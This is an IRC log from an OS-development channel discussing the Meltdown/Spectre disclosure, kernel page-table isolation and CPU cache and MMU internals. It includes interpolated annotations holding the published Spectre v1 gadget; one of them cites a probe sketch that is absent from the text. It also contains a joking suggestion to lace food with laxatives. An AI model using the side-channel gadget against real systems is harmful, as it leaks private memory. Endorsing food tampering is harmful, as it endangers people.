09:21:45 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:23:34 --- quit: nzoueidi (Ping timeout: 248 seconds)
09:24:17 --- join: gdh (~gdh@2605:a601:639:2c00:b9b9:c985:3d11:4f62) joined #osdev
09:30:37 --- join: marshmallow (~xyz@unaffiliated/marshmallow) joined #osdev
09:31:48 --- quit: bemeurer (Ping timeout: 255 seconds)
09:34:51 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:37:05 --- join: oaken-source (~oaken-sou@p3E9D33F7.dip0.t-ipconnect.de) joined #osdev
09:38:08 --- join: _sfiguser (~sfigguser@host194-66-dynamic.116-80-r.retail.telecomitalia.it) joined #osdev
09:40:45 --- quit: bemeurer (Ping timeout: 276 seconds)
09:44:52 --- join: josuedhg (~josuedhg_@134.134.139.83) joined #osdev
09:44:53 <marshmallow> don't know where to ask, it's a curiosity. say I can arbitrarily read kernel memory, how could this potentially be turned into execution of arbitrary code? wouldn't it require a further bug to achieve ROP?
09:50:46 <bcos> Does kernel use capabilities or store encryption keys or passwords for anything?
09:52:18 <Prf_Jakob> marshmallow: Well there is rowhammer, which is still out there and just mitigated by the fact that the attacker doesn't know where the kernel keeps things, which they now can.
09:52:39 <Prf_Jakob> can figure out*
09:52:48 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
09:56:47 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
09:59:38 <izabera> there's no way to use that for ROP
10:02:23 <marshmallow> izabera: why note?
10:02:28 <marshmallow> *not
10:03:12 <izabera> because you can't even read that memory normally, and you definitely can't just jump in the middle of it and execute it
10:04:11 <marshmallow> unless you have some sort of other memory corruption
10:10:03 --- quit: quc (Remote host closed the connection)
10:10:17 --- join: quc (~quc@host-89-230-166-189.dynamic.mm.pl) joined #osdev
10:11:28 --- join: regreg__ (~regreg@85.121.54.224) joined #osdev
10:13:12 --- quit: immersive (Quit: bye)
10:14:14 --- quit: bauen1 (Ping timeout: 248 seconds)
10:14:29 --- join: clickjack (~clickjack@185.161.200.10) joined #osdev
10:14:37 --- quit: regreg_ (Ping timeout: 256 seconds)
10:19:00 --- quit: nur (Remote host closed the connection)
10:21:32 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
10:23:20 --- join: nur (~hussein@175.141.12.82) joined #osdev
10:26:20 --- quit: osa1 (Ping timeout: 240 seconds)
10:26:55 --- join: regreg_ (~regreg@85.121.54.224) joined #osdev
10:28:26 <marshmallow> Prf_Jakob: what about if TRR mode is on?
10:30:41 --- quit: regreg__ (Ping timeout: 268 seconds)
10:31:50 --- quit: bauen1 (Ping timeout: 248 seconds)
10:33:38 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
10:33:54 --- join: glauxosdever (~alex@ppp-94-66-43-97.home.otenet.gr) joined #osdev
10:35:07 --- quit: uvgroovy (Quit: uvgroovy)
10:37:14 --- quit: alphawarr1or (Quit: Connection closed for inactivity)
10:42:28 --- quit: bauen1 (Ping timeout: 240 seconds)
10:42:59 --- join: awang_ (~awang@cpe-98-31-27-190.columbus.res.rr.com) joined #osdev
10:59:02 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
11:08:43 --- join: srjek (~srjek@2601:249:601:9e9d:5000:7283:c2fb:32f8) joined #osdev
11:12:24 --- quit: divine (Ping timeout: 248 seconds)
11:13:37 --- quit: grzesiek (Remote host closed the connection)
11:16:28 --- join: divine (~divine@12.164.17.129) joined #osdev
11:31:34 --- quit: jack_rabbit (Ping timeout: 248 seconds)
11:31:46 --- quit: bemeurer (Remote host closed the connection)
11:32:10 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
11:33:59 <Love4Boobies> Man, for the last day, everyone on my Facebook feed has been talking about the huge Intel vulnerability.
11:34:09 <Love4Boobies> People love a good story.
11:35:24 --- quit: jjuran (Quit: jjuran)
11:38:41 --- join: jack_rabbit (~jack_rabb@c-98-228-48-226.hsd1.il.comcast.net) joined #osdev
11:38:56 <geist> indeed
11:39:09 <geist> will be interesting to see if it lives up to expectations
11:39:53 <Love4Boobies> How are commits to Linux handled in this situation?
11:40:04 --- join: inode (~inode@unaffiliated/inode) joined #osdev
11:40:14 <geist> they seem to be public of course, but the commentary is fairly vague
11:40:28 <geist> i think there's a little bit of shade being thrown between @intel.com and @amd.com
11:40:45 <Brnocrist> so what about ARM?
11:40:57 <Brnocrist> there is a linux patch, but it should not be affected
11:41:29 <geist> here's my theory: the 'unmap the kernel' thing was already in motion, because folks have already discovered how to defeat KASLR on page table based arches (x86 and arm)
11:41:51 <geist> but this new vuln for intel i think has made it mandatory
11:43:16 --- join: dbittman|work (~dbittman|@apollo.soe.ucsc.edu) joined #osdev
11:43:32 <Brnocrist> I think so
11:44:09 <geist> in the case of ARM unmapping the kernel is fairly inexpensive, so it's mostly just a Good Idea
11:44:43 <geist> though it's possible they have a similar problem, but most ARM cores are not superscalar/OOO enough to actually do what i think the vuln is
11:45:00 <geist> but then they probably have more advanced cores in the pipeline, so maybe one of the newer ones has the problem
11:45:29 <Brnocrist> is it inexpensive on arm?
11:45:51 <geist> it should be, the MMU is similar in structure but a bit more flexible
11:46:13 <Brnocrist> it uses something like PCID?
11:46:17 --- quit: dbittman|work (Read error: Connection reset by peer)
11:46:31 <geist> yes, ASID. always has had it. it also has nice per ASID TLB flush instructions and whatnot
11:46:35 <geist> which is what x86 misses, iirc
11:47:00 --- join: dbittman|work (~dbittman|@apollo.soe.ucsc.edu) joined #osdev
11:47:04 <geist> also ARM has a split page table already. ie, there are essentially two CR3s with two page table trees, for both halves of the address space
11:47:07 --- join: tacco\unfoog (~tacco@dslb-084-057-127-104.084.057.pools.vodafone-ip.de) joined #osdev
11:47:15 <geist> so you can simply swap the kernel portion of it to one with a different ASID
11:47:23 <marshmallow> sorry but besides defeating kASLR and reading arbitrary memory, what else could the damage be?
11:47:24 <geist> and that should be cheap
11:47:25 <Brnocrist> oh it is nice
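A minimal sketch of the swap geist describes, written for AArch64 where TTBR1_EL1 holds the kernel half's translation table base (a guess at the shape, not code from any kernel discussed here):

    #include <stdint.h>

    /* Point the kernel half of the address space at a different
     * top-level table; the ISB makes the new base visible to
     * subsequent translations. */
    static inline void set_kernel_tables(uint64_t ttbr1_val)
    {
        __asm__ volatile("msr ttbr1_el1, %0\n\tisb"
                         :: "r"(ttbr1_val) : "memory");
    }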
11:47:47 <dbittman|work> huh. rebooting freebsd in qemu on my linux box causes the computer (host) to freeze. that's inconvenient.
11:48:03 <Brnocrist> it is way better than TLB splitting
11:48:09 <dbittman|work> marshmallow: those are both pretty damaging...
11:48:13 <geist> marshmallow: if you can read aribtrary memory that's completely armageddon
11:48:25 <geist> since you can just read critical passwords or whatever out of the kernel, it's a nonstarter
11:48:33 <dbittman|work> that's "you win, arbitrarily" level
11:48:54 --- nick: clickjack -> immersive
11:49:20 <geist> https://78.media.tumblr.com/ddd32c24adec676229973b8d34113684/tumblr_ojo5vgNgAo1vaqoiqo1_500.gif
11:49:21 <marshmallow> reading out of ring0 is for sure critical per se, but would it be possible to achieve some sort of kernel execution too?
11:49:58 <marshmallow> (and aren't passwords stored as hashes btw?)
11:50:14 <geist> if you can read the kernel you can read any in flight buffer, and in the case of linux, all of physical memory is mapped there
11:50:29 <geist> and page tables, so you can now figure out what pages are mapped wherever, and then rowhammer is much more powerful, etc
11:50:35 --- join: CheckDavid (uid14990@gateway/web/irccloud.com/x-oztbsxvyhembhdwx) joined #osdev
11:50:44 <geist> you could read cached files that you have no access to, etc
11:51:02 --- quit: jakogut (Quit: jakogut)
11:51:11 <_mjg> and see the passwords people type in
11:51:15 <geist> all network traffic, etc
11:51:29 <geist> yeah basically you can read any data in the system
11:51:37 <roxfan> just veeeery slowly
11:51:41 <geist> so you're just DOA right there
11:52:03 <geist> yeah, though so far i've been astonished at the lengths folks will go to, taking itty bitty info in these sploits and building a complete picture out of it
11:52:24 <geist> but, i dunno what it is precisely. i suppose i could ask around at work, but then i'd know and i'd have to shut up here
11:52:27 --- quit: paranoidandroid_ (Ping timeout: 260 seconds)
11:52:33 <geist> it's more fun to not know and wait
11:58:55 --- quit: bauen1 (Ping timeout: 252 seconds)
11:59:31 --- quit: quc (Ping timeout: 264 seconds)
11:59:33 --- join: jakogut (~jakogut_@162.251.69.147) joined #osdev
11:59:38 --- quit: vmlinuz (Quit: Leaving)
12:01:33 --- join: bauen1 (~bauen1@ip5f5bfcbd.dynamic.kabel-deutschland.de) joined #osdev
12:02:59 --- join: jakogut_ (~jakogut_@162.251.69.147) joined #osdev
12:03:02 --- quit: jakogut (Read error: Connection reset by peer)
12:03:41 --- nick: jakogut_ -> jakogut
12:06:06 --- quit: oaken-source (Ping timeout: 265 seconds)
12:11:07 --- join: TopSekret (~TopSekret@host-80-238-111-9.jmdi.pl) joined #osdev
12:11:54 --- quit: TopSekret (Client Quit)
12:14:52 --- quit: bemeurer (Ping timeout: 252 seconds)
12:16:11 --- join: virtx (5238cd4e@gateway/web/freenode/ip.82.56.205.78) joined #osdev
12:16:13 <virtx> hi
12:16:42 <sham1> hi
12:16:58 <virtx> why do page tables reside before the L2 cache? aren't they in RAM? https://cyberwtf.files.wordpress.com/2017/07/memory-hierachy.png
12:17:17 <geist> they are
12:17:28 <virtx> so what does that mean in this img?
12:17:32 <geist> it's just wrong
12:17:49 <geist> there is no 'page table' box like that
12:18:14 <virtx> so it is not me :)
12:18:36 <geist> from a memory hierarchy point of view i think they were attempting to illustrate not the physical layout but more of the path the memory subsystem goes through to access memory
12:18:49 <virtx> When a software running on a Core requires memory it starts a so called “load” command. The load command is then processed in multiple stages until the data is found and returned or an error occurred. The Figure below shows a simplified version of this sub system.
12:18:53 <virtx> this is the text
12:18:55 <geist> i think it may be technically correct, if the L1 caches are virtually tagged, which i think is actually maybe true
12:19:37 <geist> but it's not showing the physical layout, it's showing you the path that the system takes to resolve addresses and/or access
12:19:43 <virtx> so PTs are accessed before L2?
12:20:09 <geist> so assume the PTs are a black box that live in their own memory (they dont, but lets assume). then yes
12:20:22 <virtx> hmm
12:20:31 <geist> it has to consult the TLB and possibly page tables to do the translation before it knows what address to fetch from the L2
12:20:34 <geist> which is physically tagged
12:20:50 <virtx> if an address resides in L2, why should the cpu try the PTs (which are in DRAM) first?
12:20:56 <geist> now it might have to go read the L2 to get to a page table, but that's essentially a separate path that hardware takes to do the translation for you
12:21:10 <geist> if you consider the MMU to be essentially a parallel cpu doing the translation on the main cpu's behalf
12:21:24 <geist> which i think is the proper model to consider
12:21:45 <virtx> ah ok, so PTs in that img is MMU/TLB access
12:21:54 <geist> in that case then the MMU may or may not need to in parallel (or before or whatnot) access the L1/L2/L3/DRAM to translate memory for the main cpu
12:21:58 <geist> yah
12:22:10 <virtx> makes sense
12:22:52 <geist> so that's where a lot of problems happen nowadays. using timing attacks you can force the MMU to go and do page table accesses which end up taking variable amount of time based on how far it needs to search
12:23:03 <geist> and leave the cache in particular states as a result of its memory access
12:23:28 <geist> and then you can use timing to determine if it actually walked a page table structure for you, even if you ultimately have no permission to access that memory
12:23:39 <virtx> I have a very 'stupid' question regarding this. the CPU handles only physical addresses, so how is "mov rax, 0xsomevirtaddr" handled by the cpu? it never knows the virt addr, only the MMU does?
12:23:47 <geist> so you can, for example, probe if any given page is mapped in the kernel, but not necessarily access it
12:24:23 <geist> that's correct. the cpu basically immediately hands the virtual address off to the TLB, which is the local cache part of the MMU, which tries to translate it into a physical address
12:24:51 <geist> and then if it gets a hit it continues on down, if it misses, then the MMU holds off the cpu for this particular memory access and does a page table walk to see if it can fill the TLB and continue
12:25:07 <geist> this is why modern cpus are so out of order and like to prefetch so much and have so many memory operations in flight
12:25:34 <geist> it tries to access things as far in the future as it can to try to hide any latency picked up by the MMU and L1/L2/L3 caches
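The walk the MMU performs on a TLB miss can be spelled out in software. A minimal sketch for x86-64 4-level paging; phys_to_virt() is an assumed helper for reading physical memory, while the shifts and masks are the architectural ones:

    #include <stdbool.h>
    #include <stdint.h>

    #define PTE_PRESENT (1ULL << 0)
    #define PTE_PS      (1ULL << 7)                /* huge page at this level */
    #define ADDR_MASK   0x000ffffffffff000ULL

    extern uint64_t *phys_to_virt(uint64_t phys);  /* assumed helper */

    /* Resolve vaddr through the tables rooted at cr3; returns false
     * if any level is not present (i.e. the access would #PF). */
    bool translate(uint64_t cr3, uint64_t vaddr, uint64_t *paddr)
    {
        uint64_t table = cr3 & ADDR_MASK;
        for (int level = 3; level >= 0; level--) {
            unsigned idx = (vaddr >> (12 + 9 * level)) & 0x1ff;
            uint64_t pte = phys_to_virt(table)[idx];
            if (!(pte & PTE_PRESENT))
                return false;
            if (level == 0 || (level < 3 && (pte & PTE_PS))) {
                uint64_t page_mask = (1ULL << (12 + 9 * level)) - 1;
                *paddr = (pte & ADDR_MASK & ~page_mask) | (vaddr & page_mask);
                return true;
            }
            table = pte & ADDR_MASK;
        }
        return false;  /* unreachable: level 0 always terminates */
    }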
12:25:41 --- quit: R3x_ (Quit: Connection closed for inactivity)
12:26:03 <virtx> yes, but in my code I have a virtual address, and this address is never passed to the CPU, so how does it ask the MMU to translate to a phys addr?
12:26:26 <geist> sure it is. your code only deals with virtual addresses
12:26:46 <geist> it passes the virtual off to the TLB which translates it, then it accesses the physical address from then on out
12:27:10 <clever> geist: the intel bug, is it only an "address is mapped" leak, or a data leak?, and how exactly would something like javascript interact with it?
12:27:17 <geist> part of this is if you consider the MMU to be part of the 'cpu' or not. for sake of discussion here, i'm considering it to be more or less independent of the core cpu
12:27:24 <geist> clever: not a clue. i dont know
12:27:58 <virtx> I consider it part of a core (not CPU) but an independent unit
12:28:10 <geist> right. however you want to
12:28:24 <geist> but, point is it acts on behalf of the cpu
12:28:31 <virtx> yes
12:28:35 <geist> cpu gives it virtual addresses, and it does the translation to physical
12:29:07 <geist> note there's a subtlety that i kind of dont want to go into because you really need to understand cpu caches, but the original image is actually kind of correct
12:29:34 <geist> it puts the page tables *after* the L1. which is i think correct. modern intel x86s and most ARMs i know of (i dunno what AMD does) virtually index/tag the L1 cache
12:29:45 <geist> so i think for L1 cache hits you dont need to actually consult the TLB
12:29:52 <virtx> yes, can you suggest some doc about caches that is not so theoretical but very practical and close to the OS?
12:29:56 <geist> but, then there's a bunch of complexity there to make sure L1 caches dont alias each other
12:30:30 <geist> and at some point i completely grokked at least ARM's version of how they pull it off, but i forgot it
12:30:55 <geist> it has a lot to do with the reason L1 caches are more or less always the same size at around 32K or 64K. something to do with ways/sets lining up with PAGE_SIZE so that you can make sure stuff doesn't alias
12:31:34 <virtx> so L1 contains an entire page, not part of it?
12:31:51 <geist> no. they have the same cache line size as L2
12:32:03 <geist> but really it's complex what i'm talking about and I can't really explain it
12:32:13 <geist> but suffice to say L1 caches aren't much different
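The arithmetic behind geist's sizing point, as a worked example: take a 32 KB, 8-way L1 with 64-byte lines and 4 KB pages. Each way holds 32768 / 8 = 4096 bytes, i.e. 64 sets of 64-byte lines, so the set index comes from address bits [11:6]. Those bits lie entirely inside the page offset and are identical in the virtual and physical address, which is why a virtually-indexed L1 of that geometry can never alias and behaves as if physically indexed. Grow the cache without adding ways and the index spills past bit 11, and the aliasing problem (plus the hardware to handle it) appears.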
12:32:29 <geist> but... if you want to learn cpu architecture i have two books right in front of me that i highly recommend
12:32:45 <virtx> shoot the names :D
12:32:49 <geist> 1) 'Computer architecture - A quantitative approach' by Hennessy and Patterson
12:33:16 <geist> 2) 'Modern Processor Design - Fundamentals of Superscalar Processors' by Shen and Lipasti
12:33:26 <geist> the second one is quite advanced, but full of good infos
12:33:54 <geist> the first one is fairly old, but they keep putting out newer editions so it stays mostly up to date
12:33:56 <virtx> I have the second one.
12:34:06 <virtx> thanks
12:34:49 <geist> anyway, the first one i'm sure talks about caches. the key is learning about ways and sets and whatnot and how they're organized
12:35:05 <geist> i dont think it has changed much, except particular techniques depending on how you want to layer multiple sets of caches
12:35:10 --- quit: Halofreak1990 (Ping timeout: 256 seconds)
12:35:15 <geist> wikipedia probably has a decent description if anything
12:35:45 <virtx> I know how it works in general; probably to understand this kind of thing I don't need very deep knowledge about caches
12:35:50 --- join: bemeurer (~bemeurer@2804:14d:5ce0:9113:5533:47ff:12ea:1a3f) joined #osdev
12:36:39 <geist> then there's of course virtual vs physical indexing and tagging
12:36:45 <geist> VIVT, VIPT, PIPT, etc
12:37:01 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
12:37:06 <geist> and there are clever tricks (what I was talking about before with L1) that make VIPT things act like PIPT in certain situations, etc
12:37:29 <geist> PIPT is totally desirable from a programming point of view, but it is slower because you have to translate virtual addresses before you can go to the cache
12:37:44 <virtx> VIVT stands for?
12:37:49 <geist> so there are tricks to make the L1 cache look PIPT even if it's VIVT or VIPT
12:38:03 <geist> see the index/tagging statement i made before
12:38:11 <virtx> ah ok
12:38:40 <geist> anyway, a strong understanding of all this stuff i've found to be very very useful
12:38:54 <geist> because you start to see why cpu architecture decisions were made, and that actually helps osdev quite a bit
12:39:02 <geist> especially with SMP and whatnot
12:43:34 --- quit: Halofreak1990 (Ping timeout: 248 seconds)
12:44:45 --- join: Halofreak1990 (~FooBar247@5ED0A537.cm-7-1c.dynamic.ziggo.nl) joined #osdev
12:51:59 <Love4Boobies> Ah, I just accidentally discovered what the hell ~/Templates is.
12:52:56 <roxfan> accidentally?
12:53:41 <Love4Boobies> Yeah, I put some stuff in there and they showed up in New Document context menu (when I right click).
12:55:04 <Love4Boobies> I don't generally create documents that way in Linux so it's probably why I never knew. I wasn't curious what that directory was either.
12:56:59 <geist> oh that's kind of neat
12:57:57 <Love4Boobies> Yeah. You can put source files in there with copyright notices and stuff, I suppose.
12:59:01 <geist> or snarky passive aggressive notes to cow-orkers that steal your food from the fridge
12:59:07 <geist> yes you Brenda!
12:59:13 --- quit: MDude (Quit: Going offline, see ya! (www.adiirc.com))
12:59:20 <_mjg> dude
12:59:38 <_mjg> stealing food from the fridge is one of the things i really did not expect at a workplace
13:00:56 <_mjg> one dude got hit hardcore, he was buying an expensive sausage (don't ask) and someone was regularly stealing it
13:01:17 --- quit: virtx (Ping timeout: 260 seconds)
13:01:36 --- join: jjuran (~jjuran@172.58.185.5) joined #osdev
13:03:52 <graphitemaster> why would you ever do that anyways
13:04:10 <graphitemaster> like "oh I forgot to pack a lunch, I'm just going to eat what ever is in the fridge"
13:04:11 <Love4Boobies> What if you get caught?
13:04:16 <wcstok> Because you're a dick?
13:04:29 <wcstok> Some people just are
13:04:36 <_mjg> there was a bunch of people in their early 20's working for almost minimum wage in customer service
13:04:36 <Love4Boobies> I mean you have to see your coworkers every day. Do you really wanna go through that?
13:04:42 <_mjg> one of them was doing that
13:04:48 --- join: KidBeta (~textual@220-244-156-86.tpgi.com.au) joined #osdev
13:05:39 <graphitemaster> I would just leave pieces of food in the fridge cooked with laxatives in it
13:05:56 <graphitemaster> you'll quickly figure out who is eating your stuff
13:05:58 <Love4Boobies> What if no one touches them?
13:06:08 <graphitemaster> I throw 'em out periodically
13:06:18 <Love4Boobies> Then you have to cook for no one and buy laxatives all the time.
13:06:21 <graphitemaster> yes
13:06:27 <Love4Boobies> :)
13:06:31 <graphitemaster> which is fine
13:06:41 <wcstok> Then you change up the bait
13:06:43 <graphitemaster> the price you pay for an honest work place.
13:07:42 --- quit: regreg_ (Ping timeout: 250 seconds)
13:07:57 <Love4Boobies> Also, I think it might be illegal to hide meds in the fridge --- even if it's in your own food --- as long as it's in a common fridge.
13:08:08 <graphitemaster> try me
13:08:11 <Love4Boobies> Because the assumption is that people may mistake your food for theirs.
13:08:40 <Love4Boobies> Here's a better idea: put a label that says it has laxatives but don't actually put any laxatives inside.
13:08:54 <Love4Boobies> Then eat your food. And tell everyone you have shitty digestion.
13:09:12 <graphitemaster> so not only are you asshole enough to steal food, but you're asshole enough to steal food that makes you sick, sue the person who tainted it, and carry through with legal costs?
13:09:19 <graphitemaster> that's some serious asshole
13:09:51 <graphitemaster> at that point a sane judge would look at you and be like "wtf man"
13:10:44 <graphitemaster> and when word got around that you do this in the office
13:10:48 <graphitemaster> I'm sure you'd get fired
13:12:19 --- quit: glauxosdever (Quit: leaving)
13:12:37 --- join: sortie (~sortie@static-5-186-55-44.ip.fibianet.dk) joined #osdev
13:14:04 --- quit: bemeurer (Quit: Leaving)
13:20:55 --- quit: navidr (Quit: Connection closed for inactivity)
13:30:30 --- quit: jack_rabbit (Ping timeout: 248 seconds)
13:32:38 --- quit: marshmallow (Quit: Textual IRC Client: www.textualapp.com)
13:33:10 --- quit: because (Ping timeout: 248 seconds)
13:35:57 --- join: raphaelsc (~utroz@187.114.6.255) joined #osdev
13:36:04 --- join: immibis (~chatzilla@122-59-200-50.jetstream.xtra.co.nz) joined #osdev
13:36:11 --- join: because (ayy@cpe-76-173-133-37.hawaii.res.rr.com) joined #osdev
13:39:16 --- join: Darmor (~Tom@198.91.187.5) joined #osdev
13:40:06 --- quit: Asu (Ping timeout: 248 seconds)
13:42:42 --- join: Asu (~sdelang@92.184.96.213) joined #osdev
13:43:05 --- join: jack_rabbit (~jack_rabb@c-73-211-181-224.hsd1.il.comcast.net) joined #osdev
13:47:20 --- quit: Belxjander (Ping timeout: 240 seconds)
13:48:27 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
13:48:31 --- quit: Asu (Remote host closed the connection)
13:53:25 --- join: Shamar (~giacomote@unaffiliated/giacomotesio) joined #osdev
13:56:47 --- quit: banisterfiend (Quit: My MacBook has gone to sleep. ZZZzzz…)
13:57:41 --- join: uvgroovy (~uvgroovy@199.188.233.130) joined #osdev
13:59:01 --- quit: CheckDavid (Quit: Connection closed for inactivity)
14:02:03 --- quit: jjuran (Quit: jjuran)
14:03:50 --- join: Asu (~sdelang@92.184.101.102) joined #osdev
14:04:52 --- join: banisterfiend (~banister@ruby/staff/banisterfiend) joined #osdev
14:09:10 --- join: cr1901_modern (~William@c-73-160-175-67.hsd1.nj.comcast.net) joined #osdev
14:09:43 --- quit: banisterfiend (Ping timeout: 260 seconds)
14:11:52 --- quit: KidBeta (Changing host)
14:11:53 --- join: KidBeta (~textual@hpavc/kidbeta) joined #osdev
14:18:45 --- join: MDude (~MDude@c-73-187-225-46.hsd1.pa.comcast.net) joined #osdev
14:19:51 --- quit: Asu (Remote host closed the connection)
14:23:58 --- quit: MDude (Ping timeout: 240 seconds)
14:24:29 --- join: marcan (marcan@marcansoft.com) joined #osdev
14:34:33 --- join: heat (~heat@sortix/contributor/heat) joined #osdev
14:36:41 <Griwes> anyone linked https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html yet?
14:36:42 <bslsk05> ​googleprojectzero.blogspot.com: Project Zero: Reading privileged memory with a side-channel
14:36:55 <cr1901_modern> "Don't ask to ask"- ahh I see where you get that from now, sortie
14:38:58 <sortie> Griwes: Oh that was finally released
14:39:17 <Griwes> yeah, due to that tweet from earlier today I think
14:39:40 <froggey> cute names & flashy websites: https://meltdownattack.com/ https://spectreattack.com/
14:39:40 <bslsk05> ​meltdownattack.com: Meltdown and Spectre
14:39:41 <bslsk05> ​spectreattack.com: Meltdown and Spectre
14:39:46 <sortie> > 2017-06-01
14:39:52 <sortie> Now that's what I call an embargo
14:40:05 <Griwes> yeah :D
14:40:39 <cr1901_modern> Looks like ARM/AMD lied then
14:41:10 <heat> uh oh that's pretty bad
14:41:29 <heat> there's no good solution though
14:42:20 <heat> apparently linux's PTI slows programs down by 40% and breaks some userspace crap
14:44:07 <geist> cr1901_modern: sort of, only some of them apply to AMD/ARM, but there is a whole family of attacks, basically
14:44:58 <froggey> I read the original KAISER paper today, they claim a slowdown of only 0.28%. that's quite a difference
14:45:28 <sortie> Tested Processors "Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz"
14:45:37 <sortie> lol. They just tested it on their developer workstation.
14:45:40 <pictron> Pretty sure that was just due to PCID
14:45:54 <heat> yeah, PCID is probably a big help
14:46:34 --- quit: Retr0id (Remote host closed the connection)
14:47:46 <cr1901_modern> Is PCID like "ASID, but for x86", or something more?
14:47:55 <geist> yes
14:48:20 <geist> sortie: yeah variant 3 is the bad one, and that seems to only affect haswell, or at least that's what's been proven
14:48:36 --- quit: teej (Quit: Connection closed for inactivity)
14:48:44 <geist> some of the variants are reading code within the same address space, or using eBPF to read memory inside the kernel
14:48:53 <geist> and cripes, eBPF looks like a terrible idea
14:49:24 <sortie> geist: Variant 1 also sounds pretty bad
14:49:38 <sortie> See PoC 2
14:49:54 <geist> yeah but you need code running in supervisor mode to do it (via BPF)
14:50:08 <sortie> Not on the Intel Haswell Xeon CPU?
14:50:16 <sortie> BPF JIT is for AMD?
14:50:19 <geist> basically you shove in some BPF code, which gets jitted in the kernel, which then does variant 1
14:50:32 <geist> BPF jit is i think just a feature of linux
14:50:57 <sortie> BPF JIT is enabled on Intel by default but not AMD?
14:51:05 <geist> *shrug*
14:51:06 <geist> i have no idea
14:51:10 <sortie> Yeah still reading
14:51:20 <geist> but it says variant 1 works on AMD too. but that makes sense
14:51:31 <geist> that's just a local timing attack, doesn't rely on any hardware bugs
14:51:40 <geist> just a speculative load timing thing
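The gadget shape geist is summarizing, as published in the Spectre paper and the Project Zero post (array1/array2 follow the paper's example names; the page-sized stride keeps the probe lines on separate pages, away from the prefetcher). Train the branch with in-bounds x, then pass an out-of-bounds x: the bounds check eventually retires correctly, but the speculative load indexed by the secret byte leaves a cache footprint that a flush+reload probe like the one sketched earlier can read back.

    #include <stddef.h>
    #include <stdint.h>

    uint8_t array1[160];
    unsigned int array1_size = 160;
    uint8_t array2[256 * 4096];    /* one page per possible byte value */
    volatile uint8_t sink;

    /* Bounds-check-bypass victim: under misprediction, array1[x] is
     * read speculatively even for out-of-bounds x, and the dependent
     * load caches the array2 page selected by that secret byte. */
    void victim(size_t x)
    {
        if (x < array1_size)
            sink = array2[array1[x] * 4096];
    }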
14:51:45 <sortie> Hmm
14:51:49 <Griwes> this is a damn clever exploitation of how speculative execution works
14:52:09 <geist> indeed
14:52:19 <geist> i'm learning a lot from this
14:52:39 <geist> variant 3 is brutal
14:53:03 --- join: adam4813 (uid52180@gateway/web/irccloud.com/x-zhvyjkqnywjogzuf) joined #osdev
14:53:09 <geist> also interesting, it's totally based on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ which we were looking at before
14:53:10 <bslsk05> ​cyber.wtf: Negative Result: Reading Kernel Memory From User Mode – cyber.wtf
14:54:09 <geist> that seems to be intel specific. seems to rely on speculative execution running asynchronously with permission checks
14:54:22 <Griwes> so apparently AMD doesn't allow speculative memory references into higher privilege mode?
14:54:58 <geist> would appear to be so
14:55:01 <Griwes> https://lkml.org/lkml/2017/12/27/2
14:55:01 <bslsk05> ​lkml.org: LKML: Tom Lendacky: [PATCH] x86/cpu, x86/pti: Do not enable PTI on AMD processors
14:55:30 <cr1901_modern> There's too much conflicting info to parse right now
14:55:32 <Griwes> I don't understand how the bpf thing works on AMD then, seems I need to keep reading
14:55:34 <geist> if it synchronously checked the permission before going any further (which is probably lower performance) then it wouldn't get any farther
14:55:48 <geist> Griwes: the bpf thing isn't cross permission
14:56:06 <Griwes> ah!
14:56:08 <Griwes> gotcha
14:56:14 <geist> variant one attacks the local address space. linux has a (terrible idea, i think) way to inject little programs into kernel space which it JITs
14:56:27 <geist> so you can effectively jam in a BPF program that does the attack on kernel space from kernel space
14:56:46 --- join: uvgroovy_ (~uvgroovy@199.188.233.130) joined #osdev
14:56:47 <geist> ARM is apparently subject to variant 1 too, which makes sense
14:57:07 <geist> since that's more of a generic attack on anything with caches and page tables
14:57:36 <Griwes> does ARM check the privilege levels in speculative execution like AMD?
14:57:47 <geist> unknown
14:57:53 <geist> (to me at least)
14:58:32 --- quit: uvgroovy (Ping timeout: 256 seconds)
14:58:32 --- nick: uvgroovy_ -> uvgroovy
14:58:46 <Griwes> alright, time to read variant 2
14:58:56 <Griwes> ring 0 to ring -1 is always a fun thing
14:59:13 <geist> yeah variant 2 is gnarly. seems to use the BTB to figure stuff out
14:59:21 <doug16k> so what's the good-case workaround? switch PCID when entering kernel space to avoid flushing whole TLB?
14:59:30 <geist> doug16k: i think so
14:59:41 --- join: navidr (uid112413@gateway/web/irccloud.com/x-wxhyyksnbqkzqeia) joined #osdev
14:59:42 <geist> essentially put in a little trampoline that switches address spaces
14:59:52 <geist> and probably dumping the entire BTB cache, for variant 2
15:00:26 <geist> branch target buffer, i think. it's the branch predictor cache, which i think is virtually tagged.
15:00:30 <Griwes> geist, ARM has separate top-level registers for user space and kernel space virtual mem, right?
15:00:31 --- join: svk (~svk@port-92-203-6-87.dynamic.qsc.de) joined #osdev
15:00:59 <geist> correct. and ASIDs for them
15:01:06 <graphitemaster> tl;dr speculative execution is hard to get right
15:01:13 <geist> so swapping just the kernel out isn't that expensive
15:01:18 <geist> though it's additional work and stuff
15:01:19 <Griwes> yeah
15:01:28 <geist> you'd probably still want to dump the BTB though, i suspect. which is non free
15:01:31 <Griwes> that's what I thought I remembered, but I wasn't sure
15:02:14 <geist> in short, it's easy to implement FUCKWIT on arm
15:02:39 <radens> geist: does fuchsia implement KPTI/shadow kernel page tables?
15:02:46 <Griwes> I see you prefer the better name
15:03:02 <geist> radens: not yet
15:03:13 <geist> it's going to be brutal
15:03:16 --- part: wcstok left #osdev
15:04:07 <radens> it's really that brutal? I thought it would be straightforward, except for that pesky trampoline page.
